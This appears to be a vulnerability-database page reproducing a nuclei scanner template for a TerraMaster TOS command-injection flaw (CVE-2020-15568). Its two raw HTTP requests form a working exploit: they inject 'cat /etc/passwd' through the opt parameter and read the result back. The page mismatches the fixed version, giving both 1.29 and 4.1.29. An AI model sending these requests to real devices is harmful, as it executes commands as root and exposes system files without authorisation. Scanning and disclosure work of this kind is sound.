Lucene search
+L

TerraMaster TOS <.1.29 - Remote Code Execution

🗓️ 10 Sep 2026 04:50:45Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 91 Views

TerraMaster TOS <.1.29 - Remote Code Execution vulnerability in include/exportUser.ph

Related
Refs
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2020-15568
30 Jan 202100:00
attackerkb
circl
Circl
CVE-2020-15568
9 Jun 202106:36
circl
cnnvd
CNNVD
Terramaster TOS 操作系统命令注入漏洞
30 Jan 202100:00
cnnvd
cnvd
CNVD
TerraMaster TOS Dynamic Class Method Invocation Vulnerability
1 Feb 202100:00
cnvd
checkpoint_advisories
Check Point Advisories
TerraMaster TOS Command Injection (CVE-2020-15568)
22 Feb 202100:00
checkpoint_advisories
cve
CVE
CVE-2020-15568
30 Jan 202104:59
cve
cvelist
Cvelist
CVE-2020-15568
30 Jan 202104:59
cvelist
kitploit
Kitploit
TerraMaster-TOS-CVE-2020-15568
10 Sep 202608:10
kitploit
kitploit
Kitploit
CVE-2020-15568
8 Sep 202618:10
kitploit
nvd
NVD
CVE-2020-15568
30 Jan 202105:15
nvd
Rows per page
id: CVE-2020-15568

info:
  name: TerraMaster TOS <.1.29 - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: TerraMaster TOS before 4.1.29 has invalid parameter checking that leads to code injection as root. This is a dynamic class method invocation vulnerability in include/exportUser.php, in which an attacker can trigger a call to the exec method with (for example) OS commands in the opt parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Upgrade TerraMaster TOS to version 1.29 or higher to mitigate this vulnerability.
  reference:
    - https://ssd-disclosure.com/ssd-advisory-terramaster-os-exportuser-php-remote-code-execution/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-15568
    - https://help.terra-master.com/TOS/view/
    - https://github.com/divinepwner/TerraMaster-TOS-CVE-2020-15568
    - https://github.com/n0bugz/CVE-2020-15568
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-15568
    cwe-id: CWE-913
    epss-score: 0.28984
    epss-percentile: 0.98041
    cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: terra-master
    product: tos
    fofa-query: '"terramaster" && header="tos"'
  tags: cve2020,cve,terramaster,rce,terra-master,vkev,vuln
variables:
  filename: "{{to_lower(rand_text_alpha(4))}}"

http:
  - raw:
      - |
        GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3E{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
      - |
        GET /include/{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502207f830262f676d3ab1c8bc504b30380207c9d6bcb9389c0651dfe6777b30f6fdf022100ca0c97620f86ec0c7798b8a60ba44a232ffa49ea69bcf3c74cbdf40a69292c47:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.9High risk
Vulners AI Score7.9
CVSS 3.19.8
CVSS 210
EPSS0.28984
91